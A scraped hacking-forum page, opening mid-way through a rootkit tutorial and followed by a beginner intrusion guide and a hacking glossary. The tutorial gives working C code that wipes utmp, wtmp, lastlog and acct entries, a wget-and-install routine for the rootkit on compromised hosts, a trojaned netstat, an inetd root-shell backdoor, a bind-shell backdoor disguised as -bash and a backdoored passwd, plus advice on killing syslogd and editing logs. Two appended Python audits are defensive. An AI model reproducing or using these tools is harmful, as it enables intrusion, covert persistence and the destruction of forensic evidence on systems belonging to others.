if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE);
return;
}
if ( (pwd = getpwnam(who)) == NULL) {
fprintf(stderr, "ERROR: Can't find user in passwd.\n");
return;
}
lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0);
bzero((char *) &ll, sizeof(ll));
if (line)
strncpy(ll.ll_line, line, strlen(line));
if (timestr) {
/* YYMMddhhmm */
if (strlen(timestr) != 10) {
fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n");
return;
}
/*
* Extract Times.
*/
str[2] = 0;
str[0] = timestr[0];
str[1] = timestr[1];
tm->tm_year = atoi(str);
str[0] = timestr[2];
str[1] = timestr[3];
tm->tm_mon = atoi(str) - 1;
str[0] = timestr[4];
str[1] = timestr[5];
tm->tm_mday = atoi(str);
str[0] = timestr[6];
str[1] = timestr[7];
tm->tm_hour = atoi(str);
str[0] = timestr[8];
str[1] = timestr[9];
tm->tm_min = atoi(str);
tm->tm_sec = 0;
ll.ll_time = mktime(tm);
}
if (host)
strncpy(ll.ll_host, host, sizeof(ll.ll_host));
write(fd1, (char *) &ll, sizeof(ll));
close(fd1);
printf("Done.\n");
}
#ifndef NO_ACCT
/*
* ACCOUNT editing.
*/
void
wipe_acct(char *who, char *line)
{
int fd1, fd2;
struct acct ac;
char ttyn[50];
struct passwd *pwd;
struct stat sbuf;
char *tmpf;
printf("Patching %s .... ", ACCT_FILE);
fflush(stdout);
/*
* Open the acct file and temporary file.
*/
if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE);
return;
}
/*
* Grab a unique temporary filename.
*/
tmpf = tmpnam((char *) NULL);
if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) {
fprintf(stderr, "ERROR: Opening tmp ACCT file\n");
return;
}
if ( (pwd = getpwnam(who)) == NULL) {
fprintf(stderr, "ERROR: Can't find user in passwd.\n");
return;
}
/*
* Determine tty's device number
*/
strcpy(ttyn, "/dev/");
strcat(ttyn, line);
if (stat(ttyn, &sbuf) < 0) {
fprintf(stderr, "ERROR: Determining tty device number.\n");
return;
}
while ( read(fd1, &ac, sizeof(ac)) > 0 ) {
if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) )
write(fd2, &ac, sizeof(ac));
}
close(fd1);
close(fd2);
copy_file(tmpf, ACCT_FILE);
if ( unlink(tmpf) < 0 ) {
fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n");
return;
}
printf("Done.\n");
}
#endif
void
usage()
{
printf("USAGE: wipe [ u|w|l|a ] ...options...\n");
printf("\n");
printf("UTMP editing:\n");
printf(" Erase all usernames : wipe u [username]\n");
printf(" Erase one username on tty: wipe u [username] [tty]\n");
printf("\n");
printf("WTMP editing:\n");
printf(" Erase last entry for user : wipe w [username]\n");
printf(" Erase last entry on tty : wipe w [username] [tty]\n");
printf("\n");
printf("LASTLOG editing:\n");
printf(" Blank lastlog for user : wipe l [username]\n");
printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n");
printf(" Where [time] is in the format [YYMMddhhmm]\n");
printf("\n");
#ifndef NO_ACCT
printf("ACCT editing:\n");
printf(" Erase acct entries on tty : wipe a [username] [tty]\n");
#endif
exit(1);
}
int
main(int argc, char *argv[])
{
char c;
if (argc < 3)
usage();
/*
* First character of first argument determines which file to edit.
*/
c = toupper(argv[1][0]);
/*
* UTMP editing.
*/
switch (c) {
/* UTMP */
case 'U' :
if (argc == 3)
wipe_utmp(argv[2], (char *) NULL);
if (argc ==4)
wipe_utmp(argv[2], argv[3]);
#ifdef HAVE_UTMPX
if (argc == 3)
wipe_utmpx(argv[2], (char *) NULL);
if (argc == 4)
wipe_utmpx(argv[2], argv[3]);
#endif
break;
/* WTMP */
case 'W' :
if (argc == 3)
wipe_wtmp(argv[2], (char *) NULL);
if (argc == 4)
wipe_wtmp(argv[2], argv[3]);
#ifdef HAVE_UTMPX
if (argc == 3)
wipe_wtmpx(argv[2], (char *) NULL);
if (argc == 4)
wipe_wtmpx(argv[2], argv[3]);
#endif
break;
/* LASTLOG */
case 'L' :
if (argc == 3)
wipe_lastlog(argv[2], (char *) NULL,
(char *) NULL, (char *) NULL);
if (argc == 4)
wipe_lastlog(argv[2], argv[3], (char *) NULL,
(char *) NULL);
if (argc == 5)
wipe_lastlog(argv[2], argv[3], argv[4],
(char *) NULL);
if (argc == 6)
wipe_lastlog(argv[2], argv[3], argv[4],
argv[5]);
break;
#ifndef NO_ACCT
/* ACCT */
case 'A' :
if (argc != 4)
usage();
wipe_acct(argv[2], argv[3]);
break;
#endif
}
return(0);
}
================================== cut here ==================================
It seems like our little rootkit is ready! Lets put the files together:
root@nebunu~:# tar -cf rootkit.tar install.sh kupdate.c cl.c
root@nebunu~:# gzip rootkit.tar
root@nebunu~:# ftp ftp.myhost.com
I'm uploading my rootkit rootkit.tar.gz into my archive and then, after I root a host,
I type on my rooted box:
wget http://myhost.com/rootkit.tar.gz
gunzip rootkit.tar.gz
tar -xvf rootkit.tar
sh install
rm -f rootkit.tar
rm -f install.sh
That should be ready but... what if bash is modified to log everything?
Then all I have to do is to type:
killall -9 syslogd
and then look for the log file and modify it, not completely erase it!!
Then syslogd must be started again, so the admin won't notice a thing!
Here is a connection to a rooted box:
ssh -l games hacked.host.com
assword for user games:
games@hacked.host.com~:$ kupdate
Patching.... Done.
Patching.... Done.
Patching.... Done.
bash# w
No one logged in
bash#
Well, no one is logged in except me, I'm invisible!
Really? Let's not forget about /var/log/messages. I won't type rm -rf /, I'll just erase
the last line, the one in which user games appears.
Then, I want to make sure about the presence of a sniffer/keylogger:
bash# ps -aux
If there is such a thing, search for the logs and then remove your entries, but don't erase them!
bash# find / -name *log*
might be helpful sometimes.
Ooops, almost forgot about it... there is one more problem. When the hacker connects to his
hacked box, "netstat -an" shows his real IP. We have to fix that, don't we? :)
Here is a script that does the job for us:
netstat.sh
================================== cut here ==================================
#!/bin/sh
echo "netstat trojan by god-@EFNet"
echo " "
echo "whats the bclass ip you wana hide?"
read bch
echo "$bch" >> /var/tmp/.netstat
if [ -f /bin/netstat ]
then
echo "netstat found on /bin/netstat"
mv /bin/netstat /usr/local/bin/bzcat2
else
echo "cant find /bin/netstat! =["
exit 1
fi
cat >> netstat.c << _EOF_
#include
#include
#include
#include
#define NETTMP "/usr/local/bin/bzcat2"
#define NETHIDE "/var/tmp/.netstat"
int main() {
FILE *fd;
char fname[1024];
char sos[1024];
char sosa[1024];
strcpy(fname, NETHIDE);
if(!(fd = (fopen(fname, "r")))) {
printf("Error creating raw socket\n");
exit(0);
}
bzero(sos, sizeof(sos));
fgets(sos, sizeof(sos), fd);
while(fgets(sos, sizeof(sos), fd)) {
sprintf(sosa, "%s | grep -v %s", NETTMP, sos);
system(sosa);
exit(0);
}
return 0;
fclose(fd);
}
_EOF_
cc netstat.c -o /bin/netstat
echo "all done..."
rm -f netstat.sh
rm -f netstat.c
================================== cut here ==================================
This is only an example; do the same with the ps and top commands, and you will be totally invisible.
It's much better to use the existing /bin/netstat instead of changing it to another one. At least
that is the way I think :)
4) Analysis of the other rootkits
A) Well, so much about my idea of a rootkit. Let's analyse other kinds of rootkits.
If the hacked box is running inetd to start daemons then the inetd.conf backdooring
is just great in that case:
bash# echo "dhcp 21333/tcp # dhcp server" >>/etc/service
bash# echo "dhcp stream tcp nowait root /bin/sh -i" >>/etc/inetd.conf
bash# killall -HUP inetd
then connect to hacked box using netcat:
nc -vv hacked.box.server.com 21333
The other disadvantage is that anyone can connect to it and get root access. Here is a more
elevated rootkit. It can be used along with the trojaned netstat. It is shown as -bash
to a ps -A or ps -aux command :). The piece of code that does this is:
strcpy(argv[0], HIDE);
signal(SIGCHLD, SIG_IGN);
where HIDE is defined as -bash.
================================== cut here ==================================
#include
#include
#include
#include
#include
#include
#include
#include
#define P 31337
#define HIDE "-bash"
#define SH "/bin/sh"
#define LISTN 5
int main(int argc, char **argv)
{
char *fst = "\nConnected to rootkit!\n\n";
int outsock, insock, sz;
struct sockaddr_in home;
struct sockaddr_in away;
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero), 8);
strcpy(argv[0], HIDE);
signal(SIGCHLD, SIG_IGN);
if((outsock=socket(AF_INET, SOCK_STREAM, 0))<0)
exit(printf("Socket error\n"));
if((bind(outsock, (struct sockaddr *)&home, sizeof(home))<0))
exit(printf("Bind error\n"));
if((listen(outsock, LISTN))<0)
exit(printf("Listen error\n"));
sz=sizeof(struct sockaddr_in);
for(;;)
{
if((insock=accept(outsock, (struct sockaddr *)&away, &sz))<0)
exit(printf("Accept error"));
if(fork() !=0)
{
send(insock, fst, strlen(fst), 0);
dup2(insock, 0);
dup2(insock, 1);
dup2(insock, 2);
execl(SH, SH, (char *)0);
close(insock);
exit(0);
}
close(insock);
}
}
================================== cut here ==================================
B) Example: another existing rootkit is t0rn. It can be downloaded from packetstormsecurity.nl.
It uses a backdoored SSHD to listen on a port of your choice.
rm, netstat, top and ps are deleted from the system and replaced with backdoored ones that are not
logging that process. Then an entry is added in /etc/rc.d/rc.local, so in case the server
is rebooted the rootkit starts again.
Very bad idea to use it! I tested it on my system and it gave me "Segmentation fault" each
time I typed "netstat" or one of the backdoored files! If it is really necessary to backdoor
system files then use a script like netstat.sh as I've shown before; don't change them entirely.
Besides, it puts some files in /dev, being very easy to trace by the admin.
C) Example: ADORE is a well known tool that can hide any process. But if it is going to be used to hide
the rootkit there would be too many files on the hacked system. A very lame script can be
used to trace newly created files. Besides that, many problems may appear while compiling it.
D) There is no such thing as a standard rootkit. That depends on the box you're hacking.
For example if you hacked a free shell like nether.net (it is not free anymore), a good
idea would be to backdoor a command like passwd. When "passwd -d username" or "passwd username"
is invoked nothing happens, but when, let's say, "passwd -gimme root" is typed then /bin/sh would
be executed. It is possible because on most systems I've met, passwd has +s set, so everyone can
change his password. Here is the lame code:
cp /usr/bin/passwd /bin/pass
chmod +s /bin/pass
rm usr/bin/passwd
#!/bin/sh
if [ "$1"="gimmerootrightaway" ]; then
echo "Sure master!"
/bin/bash
else
/bin/pass
fi
passwd gimmerootrightaway
Sure master!
bash#
Nice heh :)
D) Another interesting & easy to do exercise for you can be a http related backdoor.
When a page is requested, a given command is executed as root. This type of rootkit
will bypass many firewalls.
5) Final words
So, what is the conclusion? What is the best rootkit? What is the best way to hide
your traces?
There is not a standard answer to these questions. That depends on system configuration,
on running services, and last but not least on your knowledge and creativity.
With a small effort someone can be nearly invisible on a hacked box, but not entirely!
There is always a trace, but be careful so it won't point to you if the admin finds your
rootkit, that is all that matters!
Never ftp/telnet/ssh/irc outside from a rooted box!
Never use BitchX or install a bouncer or a bot, they can be easily traced.
Many lamers from undernet use BitchX as a bot. They type:
BitchX someirchost.com
/nick lamer
/join #channel
/detach
But what if the admin types scr-bx and wakes up /dev/tty before the "hacker" does?
So, be careful, rootkits are illegal and you might be caught and thrown in jail.
Use them only for learning and only on your own box!
6) Greetings
Greetings to R3X, luc|f3r, alin777 and last but not least to box network. Box network should
be an example of hard work and team work. Regardless of my quarrels with some admins, one thing
I know for sure: the Internet would be much poorer if box network didn't exist. Good luck guys and
keep it that way!…
- Added by Paulhammer at 12:56pm on November 26, 2008
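Added example (not part of the paper above): cl.c removes a login by overwriting its utmp/wtmp record in place with zeros, which leaves an all-zero slot in a log that is otherwise append-only, and the logout record written later stays behind without its login. The Python scan below reports both traces; the 384-byte record layout is an assumption (Linux/glibc x86-64) and the sample data is constructed.

```python
import struct
from typing import List, NamedTuple, Optional

# Assumption: Linux/glibc x86-64 "struct utmp" (384 bytes). Other platforms
# use other layouts, so adjust the format before reading real files.
UTMP_FORMAT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)
USER_PROCESS, DEAD_PROCESS = 7, 8   # ut_type values from <utmp.h>


class Record(NamedTuple):
    index: int
    ut_type: int
    user: str
    line: str
    tv_sec: int


class Gap(NamedTuple):
    index: int                  # record number of the zeroed slot
    offset: int                 # byte offset of the slot in the file
    not_before: Optional[int]   # tv_sec of the nearest intact record before it
    not_after: Optional[int]    # tv_sec of the nearest intact record after it


def cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_records(data: bytes) -> List[Optional[Record]]:
    """Decode every full record; an all-zero slot is returned as None."""
    out: List[Optional[Record]] = []
    for index in range(len(data) // UTMP_SIZE):
        chunk = data[index * UTMP_SIZE:(index + 1) * UTMP_SIZE]
        if not any(chunk):
            out.append(None)
            continue
        f = struct.unpack(UTMP_FORMAT, chunk)
        out.append(Record(index, f[0], cstr(f[4]), cstr(f[2]), f[9]))
    return out


def find_gaps(records: List[Optional[Record]]) -> List[Gap]:
    """Zeroed slots, each bounded by the timestamps of its intact neighbours."""
    gaps = []
    for i, rec in enumerate(records):
        if rec is not None:
            continue
        before = next((r.tv_sec for r in reversed(records[:i]) if r is not None), None)
        after = next((r.tv_sec for r in records[i + 1:] if r is not None), None)
        gaps.append(Gap(i, i * UTMP_SIZE, before, after))
    return gaps


def find_orphan_logouts(records: List[Optional[Record]]) -> List[int]:
    """Logout records on a tty with no surviving login record in this file.
    A lead, not proof: log rotation also separates logins from logouts."""
    open_lines = set()
    orphans = []
    for rec in records:
        if rec is None:
            continue
        if rec.ut_type == USER_PROCESS:
            open_lines.add(rec.line)
        elif rec.ut_type == DEAD_PROCESS:
            if rec.line in open_lines:
                open_lines.discard(rec.line)
            else:
                orphans.append(rec.index)
    return orphans


def make_record(ut_type: int, user: str, line: str, tv_sec: int) -> bytes:
    """Pack one constructed record (pid and remaining fields are filler)."""
    return struct.pack(UTMP_FORMAT, ut_type, 4242, line.encode(), b"",
                       user.encode(), b"", 0, 0, 0, tv_sec, 0, 0, 0, 0, 0, b"")


def build_sample() -> bytes:
    """Constructed wtmp image: record 2 (a login on pts/1) has been zeroed."""
    rows = [
        (USER_PROCESS, "alice", "pts/0", 1700000000),
        (DEAD_PROCESS, "",      "pts/0", 1700000100),
        (USER_PROCESS, "games", "pts/1", 1700000200),
        (USER_PROCESS, "bob",   "pts/2", 1700000300),
        (DEAD_PROCESS, "",      "pts/1", 1700000400),
        (DEAD_PROCESS, "",      "pts/2", 1700000500),
    ]
    blob = bytearray(b"".join(make_record(*row) for row in rows))
    blob[2 * UTMP_SIZE:3 * UTMP_SIZE] = bytes(UTMP_SIZE)
    return bytes(blob)


if __name__ == "__main__":
    recs = parse_records(build_sample())
    for gap in find_gaps(recs):
        print(f"zeroed record {gap.index} at offset {gap.offset}, "
              f"between t={gap.not_before} and t={gap.not_after}")
    print("orphan logout records:", find_orphan_logouts(recs))
```

The time window from the neighbouring records tells a responder where to look in syslog, shell history and network logs for the session that was removed.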
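Added example (not the paper's code): three of the persistence tricks listed above leave plain-text traces, namely a second UID 0 account, a usable password on a system account such as games, and an inetd.conf entry that runs a shell as root. This Python audit checks for all three over constructed sample files; the 999 cut-off for system UIDs and the shell list are assumptions to tune per distribution.

```python
import os
import re
from typing import List

SHELLS = {"sh", "bash", "dash", "csh", "tcsh", "ksh", "zsh"}  # assumption: tune per host
SERVICE_UID_MAX = 999  # assumption: UIDs 1..999 are system accounts on this host


def rows(text: str) -> List[List[str]]:
    """Split a colon-separated file (passwd, shadow) into fields per line."""
    return [ln.split(":") for ln in text.splitlines()
            if ln.strip() and not ln.startswith("#")]


def audit_accounts(passwd_text: str, shadow_text: str) -> List[str]:
    """Flag extra UID 0 accounts and system accounts that can log in by password."""
    hashes = {f[0]: f[1] for f in rows(shadow_text) if len(f) >= 2}
    findings = []
    for f in rows(passwd_text):
        if len(f) < 7 or not f[2].isdigit():
            continue
        name, uid = f[0], int(f[2])
        if uid == 0 and name != "root":
            findings.append(f"uid0:{name}")
        if 0 < uid <= SERVICE_UID_MAX:
            pw = hashes.get(name, "*")
            if pw == "":
                findings.append(f"empty-password:{name}")
            elif not pw.startswith(("!", "*")):
                # A locked account has "!" or "*" here; anything else is usable.
                findings.append(f"service-account-password:{name}")
    return findings


def audit_inetd(inetd_text: str) -> List[str]:
    """Flag inetd.conf services whose server program is a shell run as root."""
    findings = []
    for ln in inetd_text.splitlines():
        fields = ln.split("#", 1)[0].split()
        # service, socket type, protocol, wait flag, user, server program, args...
        if len(fields) < 6:
            continue
        user = re.split(r"[.:]", fields[4])[0]
        if user == "root" and os.path.basename(fields[5]) in SHELLS:
            findings.append(f"root-shell:{fields[0]}")
    return findings


# Constructed sample files; the hashes are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games:x:12:100:games:/usr/games:/bin/sh
alice:x:1000:1000::/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$constructed$placeholder:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
games:$6$constructed$placeholder:19000:0:99999:7:::
alice:$6$constructed$placeholder:19000:0:99999:7:::
toor:$6$constructed$placeholder:19000:0:99999:7:::
"""
SAMPLE_INETD = """\
# constructed sample
ftp  stream tcp nowait root /usr/sbin/tcpd in.ftpd -l
dhcp stream tcp nowait root /bin/sh -i
"""

if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW) + audit_inetd(SAMPLE_INETD):
        print(finding)
```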
- Topic: How to hack with a ip address
- referred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.
1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.
Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https
1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown
In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.
2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.
So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.
220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400
Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8'. Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Banners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it then you can pretend to be hotmail, and steal a bunch of people's email. Well now back to the task at hand. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you can't find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.
At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.
There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________
So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze
****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****
- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports
3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports
- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.
*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*
- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage
__________________________________________________ _______________
**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root*…
- Added by syarz at 9:35pm on September 11, 2009
- Page: XP Hacking With Windows XP
- So you have the newest,
glitziest, "Fisher Price" version of Windows: XP. How
can you use XP in a way that sets you apart from the boring
millions of ordinary
users?
The key to doing amazing things w
- Added by MegaHackers.com at 4:13pm on October 11, 2007
- Page: Begineers Guide To Hacking Windows
- BEGINEERS
How do I hack? - There is no easy
way how to hack. Google is your best friend.. REMEMBER THAT! Read
any information you can find on hacking. Read hacking forums and
check out hacking websit
- Added by MegaHackers.com at 3:46pm on October 9, 2007
- Page: How To Break Into E-mail Account
-
Disclaimer :
I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life
!
Beware !!
Introduction
I have writte
- Added by MegaHackers.com at 5:44pm on October 9, 2007
- Topic: Collection of Hacking dictionary
- in.
>ACCESS PERMISSIONS: this allows you to execute, read or change a file depending on the permission.
>ACCOUNT: your presence ID on a computer system which allows you to log in.
>ADAPTER: another name for an expansion card; usually most of them plug into the expansion slots on your PC.
>ACTIVE X: a set of interactive technologies developed by Mcft; ActiveX isn't a programming language but it can be dangerous for website viruses.
>ACTIVE OPEN: a state in which TCP is attempting to initiate a connection.
>ADDRESS: a memory location. The value is often displayed as hexadecimal, mostly to keep anyone but official pc postal employees from finding things on your computer. Everything on your hard drive has a memory location.
>ADDRESS CLASS: a basic network of various sizes. The network class can be determined from the first octet of its IP address.
>ADDRESS RESOLUTION PROTOCOL: the process of determining a MAC address, given a more abstract LAN or WAN address. Any protocol used to obtain a mapping from a higher layer address to a lower layer address. Abbreviated ARP. The acronym ARP is most often used to refer to the Ethernet Address Resolution Protocol (below). The protocol used by an IP networking layer to map IP addresses to lower level hardware (i.e., MAC) addresses. There are four ARP messages for IP running over Ethernet: arp requests and replies and reverse arp requests and replies.
>ADSL: ADSL (asymmetric digital subscriber line) is a connection to the net where users don't use dial-up but have a connection 24/7 and usually have a static IP address.
>ADA: Pascal-descended language that was at one time made mandatory for Department of Defense software projects by the Pentagon. Hackers are nearly unanimous in observing that, technically, it is precisely what one might expect given that kind of endorsement by fiat; designed by committee, crockish, difficult to use, and overall a disastrous, multi-billion-dollar boondoggle (one common description wss "The PL/I of the 1980s"). Hackers find Ada's exception-handling and inter-process communication features particularly hilarious. Ada Lovelace (the daughter of Lord Byron who became the world's first programmer while cooperating with Charles Babbage on the design of his mechanical computing engines in the mid-1800s) would almost certainly blanch at the use to which her name has latterly been put; the kindest thing that has been said about it is that there is probably a good small language screaming to get out from inside its vast, elephantine bulk.
>AGENT:A program that performs one or more services (such as gathering information from the Internet), acting for or as a principal.
>ADVANCED PEER-TO-PEER NETWORKING (APPN): An IBM peer-to-peer networking architecture that uses interconnected Type 2.1 nodes. APPN supports dynamic routing, directory searches, and network management.
>ADVANCED PROGRAM-TO-PROGRAM COMMUNICATIONS (APPC): SNA's standard program-to-program communications protocol. Sometimes the term APPC is used interchangeably with Logical Unit Type 6.2 (LU 6.2).
>ALERT: A problem determination message sent to a network operator within IBM's network management system.
>ALOHA: A 4800bps Contention-Based Radio Channel Transmission System Network used in the University of Hawaii (1968 - 1972) and designed by Norman Abramson to connect the university's mainframe IBM 360 on the Island of Oahu and terminals placed throughout different ships and nearby islands. Data coming from the mainframe was sent to all other terminals, while data from terminals was the Contention-Based part and would be re-sent if no acknowledgement data was received.
>VLAN: Virtual Local Area Network. This is a network split into workgroups by routers, each assigned a server. As any message sent will state which workgroup it is aimed at, workgroups not receiving messages can run faster as traffic is reduced.
Standards
---------
>Ethernet: A network standard that is a Contention-Based Network. Ethernet evolved from a radio channel transmission system called ALOHA.
>ALT: commonly known as a computer control key, but in internet terms alt is for connecting to newsgroups just like www is for connecting to the web.
>ALT.2600.hackers: a newsgroup with about 200 posters and about 5000 lurkers; it is the group shady_harrasment_panda (writer of this dictionary) is a member of. alt.2600.hackers has a lot of very intelligent hackers in the group.
>ALTERNATIVE CLIENT RESTORE: The process of restoring files to a different client than the one from which they were backed up.
>AMERICA ONLINE (AOL): a large US-owned internet service provider company which mainly attracts newbies. AOL has the strictest rules out of all the ISPs: if you post to a hackers newsgroup they terminate your account! AOL commonly attracts lamers!
>ANTIVIRUS: a program which scans a user's hard drive looking for known viruses, worms, trojans, and joke files. Common virus scanners include Norton and McAfee.
>AMIGA: A series of personal computer models originally sold by Commodore, based on 680x0 processors, custom support chips and an operating system that combined some of the best features of Macintosh and Unix with compatibility with neither.
The Amiga was released just as the personal computing world standardized on IBM-PC clones. This prevented it from gaining serious market share, despite the fact that the first Amigas had a substantial technological lead on the IBM XTs of the time. Instead, it acquired a small but zealous population of enthusiastic hackers who dreamt of one day unseating the clones (see Amiga Persecution Complex). The traits of this culture are both spoofed and illuminated in The BLAZE Humor Viewer. The strength of the Amiga platform seeded a small industry of companies building software and hardware for the platform, especially in graphics and video applications (see video toaster).
Due to spectacular mismanagement, Commodore did hardly any R&D, allowing the competition to close Amiga's technological lead. After Commodore went bankrupt in 1994 the technology passed through several hands, none of whom did much with it. However, the Amiga is still being produced in Europe under license and has a substantial number of fans, which will probably extend the platform's life considerably.
>AMP OFF:[Purdue] vt. To run in background. From the UNIX shell `&'
>ANSI: 1. n. [techspeak] The American National Standards Institute. ANSI, along with the International Organization for Standards (ISO), standardized the C programming language (see K&R, Classic C), and promulgates many other important software standards. 2. n. [techspeak] A terminal may be said to be `ANSI' if it meets the ANSI X.364 standard for terminal control. Unfortunately, this standard was both over-complicated and too permissive. It has been retired and replaced by the ECMA-48 standard, which shares both flaws. 3. n. [BBS jargon] The set of screen-painting codes that most MS-DOS and Amiga computers accept. This comes from the ANSI.SYS device driver that must be loaded on an MS-DOS computer to view such codes. Unfortunately, neither DOS ANSI nor the BBS ANSIs derived from it exactly match the ANSI X.364 terminal standard. For example, the ESC-[1m code turns on the bold highlight on large machines, but in IBM PC/MS-DOS ANSI, it turns on `intense' (bright) colors. Also, in BBS-land, the term `ANSI' is often used to imply that a particular computer uses or can emulate the IBM high-half character set from MS-DOS. Particular use depends on context. Occasionally, the vanilla ASCII character set is used with the color codes, but on BBSs, ANSI and `IBM characters' tend to go together.
>ANGLE BRACKET: Either of the characters `<' and `>'.
